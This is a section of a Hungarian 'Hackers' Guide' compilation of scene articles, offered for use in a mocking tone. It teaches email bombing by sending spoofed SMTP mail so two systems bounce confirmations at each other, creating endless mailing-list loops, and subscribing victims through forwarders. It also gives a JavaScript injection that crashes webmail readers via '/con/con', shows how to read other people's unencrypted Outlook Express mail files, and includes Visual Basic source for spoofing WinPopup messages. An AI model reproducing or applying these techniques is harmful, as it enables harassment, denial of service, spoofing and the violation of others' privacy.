Tegyuk fel, hogy van 3 rendszer: 1: attak.com (ezek vagyunk mi) 2: friendofsux.com (az aldozat barat rendszere, amelyben megbizik (trusted system)) 3: sux.com (az aldozat maga) Nekunk mondjuk nem tetszik hogy friendofsux.com sux.com baratja es ugy dontunk hogy egymasra akarjuk oket uszitani. Vagy egyszeruen csak meg akarjuk szivatni mindket rendszert. Vagy csak ki akarjuk probalni ebben a textben leirtakat. Ne kelljen mar nekem okokat talalni a lenyeg hogy: Minden hacker wannabe tudja hogy hogy kell sendmailelni a 25-os portrol akamilyen rendszerrol es azt is hogy hogy kell spoofed mailt kuldeni ezen az uton ugy, hogy ne nagyon kapjanak el. Aki nem tudja annak nem erdemes ezt a textet vegigolvasnia. Sz'al ha lama vagy elhuzhacc a jo budos francba mer' ez nem neked valo. Ha az vagy nem kell tovabb olvasni. De tegyuk fel hogy aki eljutott idaig az nem lama. Sz'al attak.com telnetel sux.com-ra a 25-os portra es kuld egy par ezer mailt friendofsux.com-ra ami from:[email protected]. Majd bekapcsolja a confirmation when arrived-ot. Tulajdonkeppen ennyi. Es a poen: Megerkezik friendofsux.com-ra a parszazezer uzenet, es friendofsux.com automatikusan kuldozgeti vissza sux.com-ra a confirmationokat hogy az uzenetek nagyon is jol megerkeztek:)))) Sz'al a ket rencer csak annyit fog realizalni hogy a masik bombazza ot, igy szepen egymasra uszitottuk oket vagy egyszeruen csak mexivattunk 2 rencert!:) Es ha ugyesek vagyunk akkor nem lesz ott az extended headerben hogy Origin:[email protected], de ezt asszem mar ugyis tudjatok hogy hogy oldjuk meg nem en fogom leirni;) Ha nem vilagos leirom pontokban: 1: [email protected]:bash$ telnet sux.com 25 --> spoofed mail kuldese (csak ugyesen, azert sem irom le hogy kell) --> spoofed hostrol celszeru telnetelni, --> az emailnek friendofsux.com-rol kell erkeznie, --> confirm when arrived = kulcsmozzanat 2: vissza az 1-es ponthoz egy par ezerszer. Esetleg scriptet is lehet irni. 3: Nezzuk szep tag szemekkel amint friendofsux.com rencergizdaja telefonalgat sux.com rencergizdajanak hogy mi a faszt kepzel az hogy emailbombazza ot es nagyon duhos. Ekkor sux.com megnezi hogy mi nincs rendben es realizalja, hogy tulajdonkeppen friendofsux.com vagy visszaadta az emailbombazast vagy nem realizalja csak azt latja hogy van egy par ezer uzenet es hogy irto lassu a login program:)) Egy legy ket csapasra, sot meg durvabb. Nade nem vagytok ti hulyek remelem ugyhogy nem is kell hogy tovabb reszletezzem biztos leesett a lenyeg, ugyhogy inkabb abba is hagyom. Ha nem veszitek komolyan akkor is jo poen szerintem:)) minimum rohogni lehet rajta.
220
Hackers’ Guide
Engem IRCNET-en a #danubius csatin lehet megtalalni de nem rewter nick alatt: publicba kezdd el keresni rewtert es egy ido utan megtalalod foleg kora estefele...;)))) ReWtER E-mail: [email protected]
************************************************************************************************
Levélbomba Először a levélbomba fogalma. A levélbomba annyit tesz, hogy egy megszerzett email címre akár több ezer haszontalan levelet küld v.ki. Pl. egy hircsoportban , IRC-n ICQ-n vagy sima emilben kellemetlenkedők ellen használják. A jobb progik pl: Kaboom3.0 (ez a legjobb levélbombázó) mindik változtatja a feladót a témát a levéltestet, így semmijen szűrővel nem lehet megállítani. Marad a kézi átnézés, vagy egész érkezett levelek kidobása persze a "JÓ" levelek elvesznek. Ráadásul a kaboom 3.x ennél is többet tud. Akár levelezőlistára is feliratja az áldozatot úgy, hogy nem tudja lemondani. (igazábol ő nincs feliratva csak egy másik cím ami neki továbbküldi (forwardolja)a levelet). A kaboom felsorol egy párat az amerikai buzis leszbikus listákbol csak beikszelni kell és megadni az áldozat emil címét. Legtöbbször a levelek az internetes kapcsolat alatt mennek ki. A Kaboom pl: sok klónt hoz létre és különböző levelező progiként tárgyal a szerverrel. Sőt olyan is van amelyik a szerver válaszát figyelemre se méltatva küldi a levelket. DE KÉTSZER IS GONDOLD MEG MIELŐTT ILYET CSINÁLSZ KÉRLEK!! Mert ha nem vagy elégóvatos rájöhetnek hogy te voltál. pl:ip cím stb.. Ha dtatic ip-d van (mindig ugyanaz) akkor könnyű a dolga az illetőnek, esetleg a szolgáltató letiltja a saját emil címedet ha bejelentést tesz. Dani12
************************************************************************************************
"Végtelenített" E-MAIL
221
Hackers’ Guide
Elôszôr is szükségünk lesz egy levelezôlistára. Ilyet bárki készíthet ingyen a WWW.LIST.TO címen. Miután átestünk néhány formaságon, ki kell választanunk néhány személyt, akit szeretnénk feliratni a listára. Ide majd két címet kell beírnunk ezeket idôközben a WWW.INAME.COM-on tudjuk létrehozni. Ez utóbbi lapon EMAIL továbbítást kérhetünk, azaz ha az ottani címre megérkezik egy levél, akkor azt autómatikusan továbbküldi a megadott helyre. Az elsô címen a lista címére kérjünk továbbítást ([email protected]), a másodikon pedig a megbombázandó illetô E-MAILére. Az elöbbi azért kell, mert a listserver nem biztos hogy jónéven venné ha saját magának kellene leveleket küldözgetnie (persze lehet hogy nincs ezellen védve...), az utóbbi pedig azért, hogy az áldozat ne tudja lemondani a levelezôlistát - hiszen a listára tulajdonképpen ô nincsen feliratva, csupán egy másik cím, ami hozzá továbbítja a leveleket. Ettôl még persze egy hozzáértôbb illetô le tudja a listát mondani, de már addig is igen jelentôs számú levelet kap... Ezzel tehát meg is volnánk. Mi fog történni? Amint a lista elkészül, értesítést kapnak a feliratottak a létrejöttérôl. Ezt megkapja az áldozat, továbbá megkapja a másik cím is, ami továbbítja a neki megadott címre. Ez a cím történetesen a levelezôlistáé, aki kiküldi ezt is a megbombázottnak, s értesíti a rá forwardoló címet arról, hogy megkapta az üzenetet. Ez a levél utána ismét eljut hozzá, ô kiküldi az illetékeseknek, s megintcsak küld egy leigazolást - tulajdonképpen saját magának. Ezzel egy végtelen lavinát indítottunk el, aminek csak a server gazdája szabhat gátat... Gyakorlatilag - a lassú sebesség miatt - úgy fest a helyzet, hogy 10 percenként kap egy E-MAIL-t a károsult - kivéve abban az (igen valószínű)esetben, ha a servernek nem tetszik a művünk, és...
************************************************************************************************
A legegyszerûbb módszer levélbombázáshoz Ez az egészet, nem azért írom le, hogy másoknak fegyvert adjak a kezébe, hanem azért, hogy felhívjam a figyelmet az egyes levelezorendszerekben lévo bugokra... Összedobta: Nestan 1. Egészrol röviden, tömören... Szóval erre az egészre nem én jöttem rá, hanem az egyik barátom, aki felhívta rá a figyelmemet. Az egész szituáció onnan kezdodik, hogy adva vagyon egy lassú internet hozzáférés(a'la Elender) és szeretnénk a beregisztrált Freemail-es postafiókunkból webes felületen keresztül levelet küldeni valakinek. Ha arra a 'KÜLDÉS' gombra többször és többször, egymás után rákattintunk megállás nélkül illetve a felso 'TO/CÍMZETT' illetve 'CC' mezokbe ugyanazt az e-mail címet beírjuk, akkor az illeto annyiszor 2 példányt kap, ahányszor rákattintottunk a 'KÜLDÉS'
222
Hackers’ Guide
gombra... Tehát ennyi... Ez a legegyszerubb, amihez free SMTP szervereket illetve hasonló mások számára bonyolult beállítást nem kell eszközölni...
************************************************************************************************
A Freemailrol ugy altalaban
FreeMail.hu-ról úgy általában Egyik nap éppen otthon voltam betegen :[ , amikor a www.freemail.hu ingyenes levelezõ rendszer FaQ-jét olvasgattam... Elsõre ez szúrt szemet: "Központi spam szûrés A beérkezõ tömeges, kéretlen leveleket igyekszünk automatikusan kiszûrni az erre a célra létrejött, az ilyen levelek feladóit és továbbítóit szûrõ rendszerekhez csatlakozva." hát ez sux! :[ de ne csüggedjetek! ;] (modjuk a mailbombot en ugyanugy tuttam hasznalni, mint regebben, na de mindegy!)... Mondjuk van egy uj modszer bombazasra! :] (csak egy telnet app és a haverod eamil cime kell!) Ezt is a FaQ-ban talaltam: "Hol találom meg ennek a FAQ-nak a legfrissebb verzióját? Email-ben lekérhetõ egy a [email protected] címre küldött tetszõleges tartalmú levéllel. (A szerver ezt követõen automatikusan elküldi a feladó címére a szöveget.)" ugye kapizsgáljátok! :] ha nem az sem baj leírom: szóval remélem mindenki tud anonymmailt küldeni telnettel... (ha nem olvassatok utana, most nem írom le). Szóval a feladóhoz a célpont mail címét írod, és már kapja is a szép méretû filét, ezt csinald meg kb 10x és kellemes lessz! Bátrabbaknak: küldjél mailbombot a a faq címere a célpontod címével ellátva! :] Aztán mégvalami! (ez a legjobb :]): "Új olvasó felület Ezentúl összetett, például HTML kódolást tartalmazó levelek is megjeleníthetõk a webes felületen, azaz látszanak a színek, kiemelések, a szövegben elhelyezett képek. A levélben szereplõ email címek és URL-ek klikkelhetõek lettek. Javítottuk az attachmentek kezelését is." ql, aki olvasta az internettorol szolo cikkem az szerintem már kezdi is irni a levelet ;] , na, de aki nem annaki itt a meglepetés...
223
Hackers’ Guide
Szoval, ha a levélbe fogod és beirsz egy ilyen sort: Hi Akkor ez szép pirosan fog megjelenni! Nos ez alapban semmi, de igy a java-s cuccok is lefutnak :] Mondjuk ezt írod a levéltõrzsbe: <SCRIPT LANGUAGE="JavaScript">setTimeout("top.location.href = '/con/con'",100);<SCRIPT > nos ugye javaban mindenki otthon van?? ;] Megjegyzés: ez csak akkor mükszik, ha a haverod a webes felületrõl vagy olyan levprogival nézi a leveleit ami futtatja a html kodot! Hát ennyi mára tényleg ne szivassátok a freemail levlistáit csak a haverjaitokat ;] bY: DomIni$ mailto: [email protected] www.rulezlinux.com #silver
************************************************************************************************
Szex kepek e-mailre Mint tudjuk a www.extra.hu cimen ha regisztraltatjuk magunkat, akkor egy olyan email cimet kapunk, ami a megadott cimre forwardolja a a leveleket. Ugye ide barmilyen cim beirhato, senki nem fogja ellenorizni. Tehat ide barki cimet beirhatjuk, es akkor az az illeto fogja kapni a leveleket, akinek a cimet beirtuk. Tehat ha az extras cimet feliratjuk nehany listara, vagy valahova mashova, akkor tenylegesen az extra cimre fogjak kuldeni a leveleket, amit mi hoztunk letre, de vki mas kapja meg. Es a feliratott egyen nem fog rola tudomast szerezni. De persze ezt el lehet jatszani mas e-mail tovabbitoval is. Csak gondoltam ez magyar, marmint az extra, es aranyait veve egesz gyors. Na szoval a lenyegre terve. Vannak a neten olyan cimek, ahonnan e-mailre szex kepeket lehet kerni. Eloszor amikor ez extranal regisztraltatod magad, akkor egy sajat e-mailt adj meg. Majd nezz el a www.sexfiles.com vagy a www.free-sex-pics.cx cimre es irsad fel magad. Majd ezutan ezek kuldenek neked egy levelet, a szokasos szoveggel, hogy amennyiben te irattad fel magad, kuld vissza a levelet egy bizonyos idon belul. Ezutan ezt visszakuldod, es a kovetkezo lepesben az extraban megvaltoztatod az e-mail cimet. Tehat egy olyan cimet irsz be, akinek meglepit akarsz okozni ezzel. Es hogy mi fog tortenni? Naponta 10 db szex kepet fog kapni a postafiokjaba. Es ugye mivel egy leveltovabbitoval van dolga, nem egyszeru ezt lemondani. Egy darabig talan jo bulinak tunik, de mikor mar egy fel eve minden nap kap az
224
Hackers’ Guide
ember kepeket, egy kicsit idegesito lehet, foleg ha nem is ingyenes e-mail szolgaltatonal van ez a cim. >:-) Cyberfly ************************************************************************************************
Levélbomba törlése Telnetelj be a mail szolgáltatód serverére a 110-es porton! Ezután azonosítsd magad: USER [felhasználóneved] PASS [jelszavad] Ezután a DELE [levél száma] parancs segítségével törölheted a leveleket letöltésük nélkül.
************************************************************************************************
Outlook Express levelek Elfelejtetted az OutLook Express jelszavad? El akarod olvasni mások leveleit, de nem tudod a jelszavukat? A megoldás nagyon egyszeru, hiába kér az OE jelszót a profilhoz, a leveleket mégis kódolatlanul tárolja a c:\ windows\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\ Microsoft\ Outlook Express vagy ha "több felhasználós" windowsod van, akkor a c:\ windows\ Profile\ username\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxxxxxx-xxxxxxxxxxxx}\ Microsoft\ Outlook Express mappában, szintén valami spéci formában, *.dbx fájlokban. Van pár ilyen mappa, legegyszerübben úgy lehet megtalálni az igazit, hogy belekukkantasz a *.dbx fájlokba, és rákeresel egyszerubb szavakra (pl. Szia, Bye, Uvd, vagy az illeto neve, e-mail címe), mert a leveleket sima szövegként tárolja a OE, kiegészítve valami bináris formában lévo egyéb adatokkal. Ha a beállításoknál a tömörítés opció be van kapcsolva - és az OE tényleg betömöríti a leveleket - akkor az elozo módszer értelmét veszti. 225
Hackers’ Guide
Ezekek a fájlokat egy egyszeru szövegszerkesztovel is meg lehet nézni, de a levelek elolvasásához simán fel lehet használni az Outlook-ot is, csak létre kell hozni egy új profilt, és átállítani a régi mappára az eszközök/Beállítsáok/Karbantartás/Tárolómappa fülön a könyvtárat, majd újraindítani az OE-t. Aztán, ha beállítasz rá egy jelszót, akkor észrevétlenül nyomon követheted mások levelezését, illetve sajátodat ott folytathatod, ahol abbahagytad. Sun-Zero [email protected]
************************************************************************************************
Outlook Express 5 bug Ez a cikk fordítás, az eredeti cikket írta: cube [email protected] Windows alatt az Outlook Express 5.x engedélyezi az utólag megnyitott üzenetek olvasását miután egy másik üzenet meg lett nyitva. Egy speciális levél küldése által a távoli támadó lekérdezheti az aktuálisan megnyitott üzeneteidet, ezzel fontos információkat megszerezve. A probléma megállapítani az e-mail tárgyát, ami változó egy újonnan megnyitott ablakban. Ezen a változón keresztül valószínuleg hozzá tudsz férni az összes megnyitott üzenethez. Az exploit:out-exp.htm.txt Scalpal
************************************************************************************************
WinPopup és NetSend üzenetek álcázása Az anyag fordítás, eredeti cím/szerzo: "Hack-FAQ " /Wang/ FordÍtotta: Sun-Zero /[email protected]/ Ha van hozzáférésed egy LAN-hoz (Local Area Network - helyi hálózat) a munkahelyeden, vagy iskolában, kollégiumban, akkor a windows 95/98-as gépeken igen valószínü hogy winpopuppal üzengetnek a hálózaton. Ha a LAN, amihez hozzáfér használ windows NT-s gépeket akkor valószínuleg a winpopuppal egyenértéku program a Net Send vagy Messenger szolgáltatás.
226
Hackers’ Guide
A winpopup és a netsend, egyaránt üzenetközvetíto szolgáltatás a hálózatokon. Az a gondolat aljas, hogy képes vagy belépni más login nevén vagy számítógépén és ezután (feltéve hogy nekik is szintén nyitva van a program) küldsz másoknak olyan rövid üzenetet, amilyet akarsz, és utána az látszik a képernyojükön. Alapjábavéve, nevetséges, amikor oda-vissza küldözgetünk hülye üzeneteket a barátainknak. Amikor az üzenet megérkezik, akkor a géped neve látszik a feladónál. Ha te üzenetet küldesz hackelésrol, vagy más veszélyes témáról igen valószínü hogy a rendszergazda késobb megnézi, vagy szorgalmasan figyeli az üzeneteket. Ezért lenne jó tudni hogy hogyan lehet hamis üzenetet küldeni, hogy úgy látszódjon, hogy mástól származik, vagy a "feladó" nem is létezik. Mindketto, a winpopup.exe (többnyire a c:\windows könyvtárban van) és a Net Send (nem biztos a helye NT alatt - keresd meg, nyilvánvalóan a "NET SEND számítógépnév üzenet" paranccsal muködik) is ugyanolyan a protokollt használ "Mailslots"-t. Itt van egy Visual Basic forráskód az üzenetek hamisításához. Neked kell csinálni egy form-ot (Form1) amiben benne vannak a következok: •
Text box called "Text1"
•
Text box called "Text2"
•
Text box called "Text3"
•
Command Button called "Command1"
Const MAILSLOT_WAIT_FOREVER = (-1) Const OPEN_EXISTING = 3 Const GENERIC_READ = &H80000000 Const GENERIC_WRITE = &H40000000 Const GENERIC_EXECUTE = &H20000000 Const GENERIC_ALL = &H10000000 Const INVALID_HANDLE_VALUE = -1 Const FILE_SHARE_READ = &H1 Const FILE_SHARE_WRITE = &H2 Const FILE_ATTRIBUTE_NORMAL = &H80 Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFileName As Long, ByVal lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As Long, ByVal hTemplateFile As Long) As Long Private Sub Command1_Click() SendMsg(Text1.Text, Text2.Text, Text3.Text)
227
Hackers’ Guide
End Sub Function SendMsg(From As String, To As String, Text As String) As Long Dim rc As Long Dim mshandle As Long Dim msgtxt As String Dim byteswritten As Long Dim mailslotname As String ' name of the mailslot mailslotname = "\\" + To + "\mailslot\messngr" msgtxt = From + Chr(0) + To + Chr(0) + Text + Chr(0) mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1) rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0) rc = CloseHandle(mshandle) End Function '----------------------------- END OF CODE ------------------------------------A program használata: •
Fordítsd le .exe-nek
•
Futtasd
•
"Text1" helyére írd be az üzenet feladóját, ide bármit beírhatsz.
•
"Text2" helyére írd be az üzenet címzettjét (bármelyik számítógép neve, vagy bármelyik login név)
•
"Text3" helyére írd be az üzenetet
•
Nyomd meg a Command1 gombot az üzenet elküldéséhez.
Biztos vagyok benne, el tudsz gondolkodni a program saját használatodra való fordításához. (Ugyanis a programban van egy-két kisebb hiba - Sun-Zero)
End of Volume #1
228